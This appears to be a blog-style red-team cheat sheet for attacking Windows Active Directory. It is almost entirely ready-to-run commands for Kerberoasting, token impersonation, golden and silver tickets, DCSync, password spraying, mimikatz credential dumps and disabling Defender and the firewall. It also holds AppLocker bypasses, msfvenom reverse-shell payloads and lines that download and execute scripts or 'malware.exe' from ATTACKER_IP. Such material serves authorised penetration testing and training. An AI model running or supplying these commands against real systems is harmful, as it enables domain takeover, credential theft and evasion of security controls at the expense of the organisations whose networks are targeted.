Active Directory privilege escalation cheat sheet
Recon
- # Systeminfo
- systeminfo
- hostname
- # Especially good with hotfix info
- wmic qfe get Caption,Description,HotFixID,InstalledOn
- # What users/localgroups are on the machine?
- net users
- net localgroups
- net localgroup Administrators
- net user morph3
- # Crosscheck local and domain too
- net user morph3 /domain
- net group Administrators /domain
- # Network information
- ipconfig /all
- route print
- arp -A
- # To see what tokens we have
- whoami /priv
- # Recursive string scan
- findstr /spin “password” *.*
- # Running processes
- tasklist /SVC
- # Network connections
- netstat -ano
- # Search for writeable directories
- dir /a-r-d /s /b
- ### Some good one-liners
- # Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths):
- sc query state= all | findstr “SERVICE_NAME:” >> a & FOR /F “tokens=2 delims= ” %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo ——— & @sc qc %i | findstr “BINARY_PATH_NAME” & @echo.) & del a 2>nul & del b 2>nul
Elevation of Privileges
General
- # PowerShellMafia
- # Use always dev branch others are shit.
- https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
- powershell.exe -c “Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks”
- powershell.exe -c “Import-Module C:\Users\Public\Get-System.ps1; Get-System”
- # Sherlock
- https://github.com/rasta-mouse/Sherlock
- # Unquoted paths
- wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\\” |findstr /i /v
Kerberoast
Simple logic for kerberoast is
requesting tickets and cracking them(offline, doesn’t produce any logs)
– For kerberos to work, times have to be within 5 minutes between attacker and
victim.
- # Rubeus
- .\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234
- # List available tickets
- setspn.exe -t evil.corp -q */*
- powershell.exe -exec bypass -c “Import-Module .\GetUserSPNs.ps1”
- cscript.exe GetUserSPNs.ps1
- # List cached tickets
- Invoke-Mimikatz -Command ‘”kerberos::list”‘
- powershell.exe -c “klist”
- powershell.exe -c “Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command ‘”kerberos::list”‘”
- # Request tickets
- Add-Type -AssemblyName System.IdentityModel
- New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “HTTP/web01.medin.local”
- # Requesting remotely
- python GetUserSPNs.py -request ECORP/morph3:[email protected]
- # Extract tickets
- powershell.exe -c “Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat”
- Invoke-Mimikatz -Command ‘”kerberos::list /export”‘
- # Crack Tickets
- python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
Juicy Potato
https://github.com/ohpe/juicy-potato/releases
Pick one CLSID from here according to your system
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Required tokens :- SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege
- C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a “/c whoami > C:\Users\Public\morph3.txt” -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
Stored Credential
- # To check if there is any stored keyscmdkey /list
- # Using them
- runas /user:administrator /savecred “cmd.exe /k whoami”
Impersonating Tokens with meterpreter
- use incognito
- list_tokens -u
- impersonate_token NT-AUTHORITY\System
Lateral Movement
PsExec, SmbExec, WMIExec, RDP, PTH in
general.
WinRM is always good. Check groups carefully.
Since windows gave support to OpenSSH we should also consider SSH.
Mimikatz Ticket PTH
- Enable-PSRemoting
- mimikatz.exe ‘” kerberos:ptt C:\Users\Public\ticketname.kirbi”‘ “exit”
- Enter-PSSession -ComputerName ECORP
WinRM
- $pass = ConvertTo-SecureString ‘supersecurepassword’ -AsPlainText -Force
- $cred = New-Object System.Management.Automation.PSCredential (‘ECORP.local\morph3’, $pass)
- Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
- # Evil-WinRM
- https://github.com/Hackplayers/evil-winrm
- ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
PTH with Mimikatz
- Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command”‘
Database Links
- # PowerUpSQL
- https://github.com/NetSPI/PowerUpSQL
- Get-SQLServerLink -Instance server -Verbose
- powershell.exe -c “Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql”
- # To see servers
- select srvname from master..sysservers;
- # Native
- Get-SQLServerLinkCrawl -Instance server -Query “exec master..xp_cmdshell ‘whoami'”
- # Linked database tables
- select * from openquery(“ECORP\FOO”, ‘select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES’)
- # You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler
- # With meterpreter module you can find linked databases and if you are admin on them
- # You can do a query and try to enable xp_cmpshell on that server
- select * from openquery(“server”,’select * from master..sysservers’) EXECUTE AS USER = ‘internal_user’ (‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “server”
Golden and Silver Tickets
Keys depend of ticket :
–> for a Golden, they are from the krbtgt account;
–> for a Silver, it comes from the “computer account” or “service account”.
- # Golden Ticket
- # Extract the hash of the krbtgt user
- lsadump::dcsync /domain:evil.corp /user:krbtgt
- lsadump::lsa /inject
- lsadump:::lsa /patch
- lsadump::trust /patch
- # creating the ticket
- # /rc4 or /krbtgt – the NTLM hash
- # /sid you will get this from krbtgt dump
- # /ticket parameter is optional but default is ticket.kirbi
- # /groups parameter is optional but default is 513,512,520,518,519
- # /id you can fake users and supply valid Administrator id
- kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
- kerberos::ptt golden.tck # you can also add /ptt at the kerberos::golden command
- # After this , final ticket must be ready
- # You can now verify that your ticket is in your cache
- powershell.exe -c “klist”
- # Verify that golden ticket is working
- dir \\DC\C$
- psexec.exe \\DC cmd.exe
- # Purge the currently cached kerberos ticket
- kerberos::purge
- #metasploit module can also be used for golden ticket, it loads the ticket into given session
- post/windows/escalate/golden_ticket
- # Silver Ticket
- # Silver Ticket allows escalation of privileges on DC
- # /target t he server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, …)
- # /service – The service name for the ticket (ex: cifs, rpcss, http, mssql, …)
- # Examples
- kerberos::golden /user:morph3 /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local.1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103
- sqlcmd -S evilcorp-sql102.evilcorp.local
- select SYSTEM_USER;
- GO
- kerberos::golden /user:JohnDoe /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt
AD Attacks
Enumeration
- # Basic ldap enumeration
- enum4linux -a 192.168.1.2
- python windapsearch.py -u morph3 -p morph3 -d evil.corp –dc-ip 192.168.1.2
- python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
Bruteforce on ldap
- # Password spray
- https://github.com/dafthack/DomainPasswordSpray
- Import-Module .\DomainPasswordSpray.ps1
- Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
- # Password brute
- ./kerbrute_linux_amd64 bruteuser -d evil.corp –dc 192.168.1.2 rockyou.txt morph3
- # Username brute
- ./kerbrute_linux_amd64 userenum -d evil.corp –dc 192.168.1.2 users.txt
- # Password spray
- ./kerbrute_linux_amd64 passwordspray -d evil.corp –dc 192.168.1.2 users.txt rockyou.txt
DC Shadow

DC Shadow attack aims to inject malicious Domain Controllers into AD infrastructure so that we can dump actual AD members.
- #Find sid for that user
- wmic useraccount where (name=’administrator’ and domain=’%userdomain%’) get name,sid
- #This will create a RPC Server and listen
- lsadump::dcshadow /object:”CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local” /attribute:sidhistory /value:sid
- # Run this from another mimikatz
- lsadump::dcshadow /push
- # After this unregistration must be done
- # Relogin
- lsadump::dcsync /domain:ECORP.local /account:krbtgt
- # Now you must have krbtgt hash
- https://attack.stealthbits.com/how-dcshadow-persistence-attack-works
DC Sync
- #####
- lsadump::dcsync /domain:domain /all /csv
- lsadump::dcsync /user:krbtgt
- #####
- https://gist.github.com/monoxgas/9d238accd969550136db
- powershell.exe -c “Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat”
- #####
- python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\[email protected]
- python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
Bypass-Evasion Techniques
Powershell Constrained Language Bypass
- powershell.exe -v 2 -ep bypass -command “IEX (New-Object Net.WebClient).DownloadString(‘http://ATTACKER_IP/rev.ps1’)
- PSByPassCLM
- powershell.exe -exec bypass -c
Windows Defender
- sc config WinDefend start= disabled
- sc stop WinDefend
- # Powershell
- Set-MpPreference -DisableRealtimeMonitoring $true
- # Remove definitions
- “%Program Files%\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All
Firewall
- Netsh Advfirewall show allprofiles
- NetSh Advfirewall set allprofiles state off
Ip Whitelisting
- New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
Applocker ByPass
- https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
- https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
- https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
- # Multistep process to bypass applocker via MSBuild.exe:
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i > out.cs
- # Replace the buf-sc and save it as out.csproj
- https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml
- Invoke-WebRequest “http://ATTACKER_IP/payload.csproj” -OutFile “out.csproj”; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj
- # or you can simply use my tool 🙂
- https://github.com/morph3/Msbuild-payload-generator
- sudo python msbuild_gen.py -a x86 -i 10 –lhost 192.168.220.130 –lport 9001 -m
GreatSCT
- # This also needs Veil-Framework
- python GreatSCT.py –ip 192.168.1.56 –port 443 -t Bypass -p installutil/powershell/script.py -c “OBFUSCATION=ascii SCRIPT=/root/script.ps1”
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe
- python3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp –ip 192.168.1.56 –port 9001
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll
EvilSalsa
- #Preparing payloads
- python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
- EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
- #Executing payload
- SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001
- # Reverse icmp shell
- python icmpsh_m.py “ATTACKER_IP” “VICTIM_IP”
- SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP
Miscellaneous
Changing Permissions of a file
- icacls text.txt /grant Everyone:F
Downloading files
- IEX (New-Object System.Net.WebClient).DownloadString(“http://ATTACKER_IP/rev.ps1”)
- (New-Object System.Net.WebClient).DownloadFile(“http://ATTACKER_SERVER/malware.exe”, “C:\Windows\Temp\malware.exe”)
- Invoke-WebRequest “http://ATTACKER_SERVER/malware.exe” -OutFile “C:\Windows\Temp\malware.exe”
- certutil.exe -urlcache -split -f “http://127.0.0.1:80/shell.exe” shell.exe
Adding user to Domain admins
- Add-DomainGroupMember -Identity ‘Domain Admins’ -Members morph3 -Verbose
Base64 Encode-Decode
- certutil -decode foo.b64 foo.exe
- certutil -encode foo.exe foo.b64
Network sharing
- # Local share
- net share
- wmic share get /format:list
- # Remote share
- net view
- net view \\dc.ecorp.foo /all
- wmic /node: dc.ecorp.foo share get
- # Mounting share
- net use Z: \\127.0.0.1\C$ /user:morph3 password123
Port Forwarding
- # Port forward using plink
- plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
- # Port forward using meterpreter
- portfwd add -l attacker-port -p victim-port -r victim-ip
- portfwd add -l 3306 -p 3306 -r 192.168.1.56
Powershell Portscan
- 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) “Port $_ is open!”} 2>$null
Recovering Powershell Secure String
- ######
- $user = “morph3”
- $file = “morph3-pass.xml”
- $cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
- Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }
- ######
- [System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR(“string”))
- ######
- $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
- $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
- [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
- $result
Injecting PowerShell scripts Into sessions
- Invoke-Command -FilePath scriptname -Sessions $sessions
- Enter-PSSession -Session $sess
Enable RDP
- # CMD
- reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f
- # Powershell
- Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’-name “fDenyTSConnections” -Value 0
- Enable-NetFirewallRule -DisplayGroup “Remote Desktop”
- # Optional
- net localgroup “Remote Desktop Users” morph3 /add
- # Reruling firewall
- netsh advfirewall firewall set rule group=”remote desktop” new enable=Yes
- netsh advfirewall firewall add rule name=”allow RemoteDesktop” dir=in protocol=TCP localport=3389 action=allow
Decrypting EFS files with Mimikatz
Follow the link here How to Decrypt EFS Files
- privilege::debug
- token::elevate
- crypto::system /file:”C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert” /export
- dpapi::capi /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id”
- # Clear text password
- dpapi::masterkey /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey” /password:pass123
- # After this command you must have the exported .der and .pvk files
- dpapi::capi /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id” /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b
- openssl x509 -inform DER -outform PEM -in blah.der -out public.pem
- openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem
- openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out cert.pfx
- # Import the certificate
- certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot
- type “C:\Users\Administrator\Documents\encrypted.txt”
Post exploitation – information gathering
Reading Event Logs
User must be in “Event Log Reader”
group
Follow this link
- Get-WinEvent -ListLog *
- # Listing logs of a specific user
- $cred = Get-Credentials
- Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred
- # Reading Security logs
- (Get-WinEvent -FilterHashtable @{LogName = ‘Security’} | Select-Object @{name=’NewProcessNam
- e’;expression={ $_.Properties[5].Value }}, @{name=’CommandLine’;expression={
- $_.Properties[8].Value }}).commandline
Password Dump
- # Metasploit
- post/windows/gather/enum_chrome
- post/multi/gather/firefox_creds
- post/firefox/gather/cookies
- post/firefox/gather/passwords
- post/windows/gather/forensics/browser_history
- post/windows/gather/enum_putty_saved_sessions
- # Empire
- collection/ChromeDump
- collection/FoxDump
- collection/netripper
- credentials/sessiongopher
- # mimikatz
- privilege::debug
- sekurlsa::logonpasswords
Shadow copy
There might be a case where you are privileged but can’t read-access to shadow files(NTDS.dit, SYSTEM etc.)
- diskshadow.exe
- set context persistent nowriters
- add volume C: alias morph3
- create
- expose %morph3% Z:
- # Deletion
- delete shadows volume %morph3%
- reset
NTDS.dit dump
- secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
- python crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com –ntds drsuapi
- # on DC, lsass.exe can dump hashes
- lsadump::lsa /inject
Summary of tools
Ad Environment
Post Exploitation
Empire
DeathStar
CrackMapExec
– CME
Covenant
Rubeus
SharpDPAPI
Bypass
Ebowla
Veil-Framework
PsBypassCLM
Swiss Knife
Recent Comments